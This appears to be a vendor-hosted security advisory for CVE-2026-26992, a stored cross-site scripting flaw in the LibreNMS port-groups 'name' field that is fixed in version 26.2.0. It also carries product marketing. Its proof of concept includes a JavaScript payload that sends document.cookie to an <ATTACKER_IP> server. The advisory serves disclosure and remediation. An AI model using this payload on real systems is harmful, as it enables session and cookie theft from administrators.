CVE-2026-26992

CVE-2026-26992 is a medium-severity cross-site scripting (XSS) vulnerability in librenms/librenms (composer), affecting versions < 26.2.0. It is fixed in 26.2.0.

Summary

/port-groups name Stored Cross-Site Scripting

  • HTTP POST
  • Request-URI(s): "/port-groups"
  • Vulnerable parameter(s): "name"
  • Attacker must be authenticated with "admin" privileges.
  • When a user adds a port group, an HTTP POST request is sent to the Request-URI "/port-groups". The name of the newly created port group is stored in the value of the name parameter.
  • After the port group is created, the entry is displayed along with some relevant buttons like Edit and Delete.

Details

The vulnerability exists as the name of the port group is not sanitized of HTML/JavaScript-related characters
or strings. When the delete button is rendered, the following template is used to render the page:

resources/views/port-group/index.blade.php:

@extends('layouts.librenmsv1')
@section('title', __('Port Groups'))
@section('content')
<div class="container-fluid">
<x-panel id="manage-port-groups-panel">
// [...Truncated...]
@foreach($port_groups as $port_group)
// [...Truncated...]

<button type="button" class="btn btn-danger btn-
sm" title="{{ __('delete Port Group') }}" aria-label="{{ __('Delete') }}"

onclick="delete_pg(this, '{{ $port_group-
>name }}', '{{ route('port-groups.destroy', $port_group->id) }}')"> // using the
port's name in the Delete button functionality without sanitizing for XSS related
characters/strings

As the device's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored
cross-site scripting.

PoC

  • Login
  • Select Ports > Manage Port Groups
  • Select New Port Group
  • Input 12345');varpt=newImage();pt.src='http://<ATTACKER_IP>/cookiePG'.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, '12345 into the "Name" input box (change <ATTACKER_IP> to be an the IP of an attacker controlled webserver)
  • Select Save
  • Select the Delete Icon for the newly created Port Group
  • Select OK
  • The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled server, leaking the user's cookies.

Impact

Untrusted input is rendered as active markup in a victim's browser, which can run script in their session. Typical impact: session or credential theft, and actions taken as the user.

Affected versions

librenms/librenms (< 26.2.0)

Security releases

librenms/librenms → 26.2.0 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade librenms/librenms to 26.2.0 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-26992? CVE-2026-26992 is a medium-severity cross-site scripting (XSS) vulnerability in librenms/librenms (composer), affecting versions < 26.2.0. It is fixed in 26.2.0. Untrusted input is rendered as active markup in a victim's browser, which can run script in their session.
  2. Which versions of librenms/librenms are affected by CVE-2026-26992? librenms/librenms (composer) versions < 26.2.0 is affected.
  3. Is there a fix for CVE-2026-26992? Yes. CVE-2026-26992 is fixed in 26.2.0. Upgrade to this version or later.
  4. Is CVE-2026-26992 exploitable, and should I be worried? Whether CVE-2026-26992 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2026-26992 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-26992? Upgrade librenms/librenms to 26.2.0 or later.

Other vulnerabilities in librenms/librenms

CVE-2026-6204CVE-2026-26990CVE-2026-26989CVE-2026-26988CVE-2026-27016

Stop the waste.
Protect your environment with Kodem.